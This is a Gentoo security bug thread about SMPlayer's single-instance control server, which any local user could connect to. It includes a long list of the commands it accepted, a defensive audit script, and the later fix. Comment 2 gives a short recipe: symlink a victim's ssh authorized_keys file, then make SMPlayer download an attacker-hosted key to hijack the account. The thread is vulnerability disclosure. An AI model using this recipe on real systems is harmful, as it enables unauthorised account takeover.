
Bug 326449

Summary: <media-video/smplayer-0.8.0: local denial of service
Product: Gentoo Security Reporter: ta2002 <throw_away_2002>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: kensington
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
Whiteboard: B3 [glsa]
Package list:
Runtime testing required: ---
Bug Depends on: 417979    
Bug Blocks:    

Description ta2002 2010-07-01 13:16:38 UTC
I have probably misdescribed this, but I don't really know HOW to describe it other than one of the most idiotic things I have ever seen.

Running smplayer (apparently there is no way to turn off this "feature") starts a server that ANY local user can telnet to and control.

I am not sure how much actual damage one can do (other than a lot of mischief), but the available remote functions include:

open_file
open_directory
open_playlist
open_vcd
open_audio_cd
open_dvd
open_dvd_folder
open_url
close
clear_recents
edit_tv_list
jump_tv_list
next_tv
previous_tv
tv_menu
edit_radio_list
jump_radio_list
next_radio
previous_radio
radio_menu
play
play_or_pause
pause
pause_and_frame_step
stop
frame_step
rewind1
rewind2
rewind3
forward1
forward2
forward3
set_a_marker
set_b_marker
clear_ab_markers
repeat
jump_to
normal_speed
halve_speed
double_speed
dec_speed
inc_speed
dec_speed_4
inc_speed_4
dec_speed_1
inc_speed_1
fullscreen
compact
video_equalizer
screenshot
multiple_screenshots
video_preview
flip
mirror
motion_vectors
postprocessing
autodetect_phase
deblock
dering
add_noise
add_letterbox
upscaling
audio_equalizer
mute
decrease_volume
increase_volume
dec_audio_delay
inc_audio_delay
audio_delay
load_audio_file
unload_audio_file
extrastereo_filter
karaoke_filter
volnorm_filter
load_subs
unload_subs
dec_sub_delay
inc_sub_delay
sub_delay
dec_sub_pos
inc_sub_pos
dec_sub_scale
inc_sub_scale
dec_sub_step
inc_sub_step
use_ass_lib
use_closed_caption
use_forced_subs_only
subtitle_visibility
show_find_sub_dialog
upload_subtitles
show_playlist
show_file_properties
show_preferences
show_mplayer_log
show_smplayer_log
faq
cl_options
tips
about_qt
about_smplayer
play_next
play_prev
move_up
move_down
move_left
move_right
inc_zoom
dec_zoom
reset_zoom
auto_zoom
zoom_169
zoom_235
exit_fullscreen
next_osd
dec_contrast
inc_contrast
dec_brightness
inc_brightness
dec_hue
inc_hue
dec_saturation
inc_saturation
dec_gamma
inc_gamma
next_video
next_audio
next_subtitle
next_chapter
prev_chapter
toggle_double_size
reset_video_equalizer
reset_audio_equalizer
show_context_menu
next_aspect
next_wheel_function
show_filename
toggle_deinterlacing
osd_none
osd_seek
osd_timer
osd_total
denoise_none
denoise_normal
denoise_soft
size_50
size_75
size_100
size_125
size_150
size_175
size_200
size_300
size_400
deinterlace_none
deinterlace_l5
deinterlace_yadif0
deinterlace_yadif1
deinterlace_lb
deinterlace_kern
channels_stereo
channels_surround
channels_ful51
stereo
left_channel
right_channel
aspect_detect
aspect_1:1
aspect_3:2
aspect_4:3
aspect_5:4
aspect_14:9
aspect_14:10
aspect_16:9
aspect_16:10
aspect_2.35:1
aspect_none
rotate_none
rotate_clockwise_flip
rotate_clockwise
rotate_counterclockwise
rotate_counterclockwise_flip
on_top_always
on_top_never
on_top_playing
toggle_stay_on_top
dvdnav_up
dvdnav_down
dvdnav_left
dvdnav_right
dvdnav_menu
dvdnav_select
dvdnav_prev
dvdnav_mouse
speed_menu
ab_menu
videotrack_menu
videosize_menu
zoom_menu
aspect_menu
deinterlace_menu
videofilter_menu
rotate_menu
ontop_menu
audiotrack_menu
audiofilter_menu
audiochannels_menu
stereomode_menu
subtitlestrack_menu
titles_menu
chapters_menu
angles_menu
programtrack_menu
osd_menu
quit
show_tray_icon
restore/hide
pl_open
pl_save
pl_play
pl_next
pl_prev
pl_move_up
pl_move_down
pl_repeat
pl_shuffle
pl_preferences
pl_add_current
pl_add_files
pl_add_directory
pl_remove_selected
pl_remove_all
pl_edit
timeslider_action
volumeslider_action
timelabel_action
rewindbutton_action
forwardbutton_action
toggle_video_info
toggle_frame_counter
show_main_toolbar
show_language_toolbar

It seems there is the ability to retrieve and save files as another user, which is not really something I want in any program I am running.
Comment 1 ta2002 2010-07-01 13:28:44 UTC
Oops. I guess this can be turned off by setting:

use_single_instance=false

in ~/.config/smplayer/smplayer.ini

It still (at least) merits a warning when installed (assuming people read them).
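An added audit script (not part of the bug report or of SMPlayer) that checks the per-user smplayer.ini files on a multi-user host for the mitigation named in comment 1. It assumes only the key/value line shape shown above and the `~/.config/smplayer/smplayer.ini` path; the directory layout under `/home` is an assumption.

```shell
#!/bin/sh
# Added example, not from the bug report: audit every user's smplayer.ini for
# the comment 1 mitigation (use_single_instance=false). Assumes the flat
# key=value ini format quoted above and a /home/<user> layout.

# Return 0 if FILE disables the single-instance control server, 1 if the key is
# enabled or absent (the default the reporter hit), 2 if FILE is unreadable.
check_smplayer_ini() {
    file=$1
    [ -r "$file" ] || return 2
    # Last matching line wins, as with most ini parsers; ignore case/whitespace.
    val=$(grep -i '^[[:space:]]*use_single_instance[[:space:]]*=' "$file" \
          | tail -n 1 \
          | sed 's/^[^=]*=[[:space:]]*//; s/[[:space:]]*$//' \
          | tr 'A-Z' 'a-z')
    [ "$val" = "false" ] && return 0
    return 1
}

# Walk every home directory under BASE (default /home) and report users whose
# config still leaves the local control server enabled. Returns 1 if any do.
audit_all_users() {
    base=${1:-/home}
    rc=0
    for dir in "$base"/*/; do
        ini="$dir.config/smplayer/smplayer.ini"
        [ -e "$ini" ] || continue   # user never ran smplayer; nothing to check
        if check_smplayer_ini "$ini"; then
            echo "OK   $ini: use_single_instance=false"
        else
            echo "WARN $ini: single-instance server not disabled"
            rc=1
        fi
    done
    return $rc
}
```

Run `audit_all_users` as root to cover all home directories; a non-root run only sees files it can read.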
Comment 2 ta2002 2012-01-02 01:06:51 UTC
I am a bit surprised that nothing has been done on this in eighteen months. With the release of a new version (0.6.10), it seems like a good time to address it.

Given that one can download arbitrary files as the user running smplayer, it is easy to compromise the account of the user running smplayer.

If ssh is in use on the machine, it is absolutely trivial:

cd /tmp
ln -s /home/victim/.ssh/authorized_keys mypublickey
telnet to smplayer and download http://myserver/mypublickey with permissions of the victim

If a bonehead like me can figure this out, I shudder to think what someone who is reasonably clever can do.
Comment 3 Sébastien P. 2012-01-10 18:22:44 UTC
I did not understand everything of your demonstration (I am probably more of a bonehead than you :p).

Since it's an SMPlayer problem, have you posted a bug or something like that on the official website?
Comment 4 ta2002 2012-01-11 11:15:29 UTC
(In reply to comment #3)
> I did not understand everything of your demonstration (I am probably more
> bonehead than you :p).

Basically, if one can write files as another user, one can overwrite things such as ssh keys (and replacing authorized_keys with a malicious user's key means that the malicious user can then log in as the victim).

> Since it's a SMPlayer's problem, have you post a bug or something like that on
> the official website?

I haven't. This appears to be a "feature" they are proud of, and while it seems like an idiocy to me, there is always a significant chance that I don't know what I am talking about.
Comment 5 Michael Palimaka (kensington) gentoo-dev 2012-09-06 08:05:32 UTC
As of smplayer-0.8.0 (which is currently the only version in the tree), the network access has been replaced with a named local socket.

We therefore are no longer affected by the described issue.
Comment 6 Ben de Groot (RETIRED) gentoo-dev 2012-09-06 10:02:34 UTC
smplayer2, which is a fork of smplayer-0.7, might still be affected.
Comment 7 Michael Palimaka (kensington) gentoo-dev 2012-09-06 10:11:16 UTC
(In reply to comment #6)
> smplayer2, which is a fork of smplayer-0.7, might still be affected.

It appears to be.
Comment 8 Sean Amoss (RETIRED) gentoo-dev Security 2012-09-17 21:21:20 UTC
Stabilization was completed in bug #417979. 

GLSA vote: no.
Comment 9 Tim Sammut (RETIRED) gentoo-dev 2012-09-20 23:48:35 UTC
GLSA Vote: no too, closing.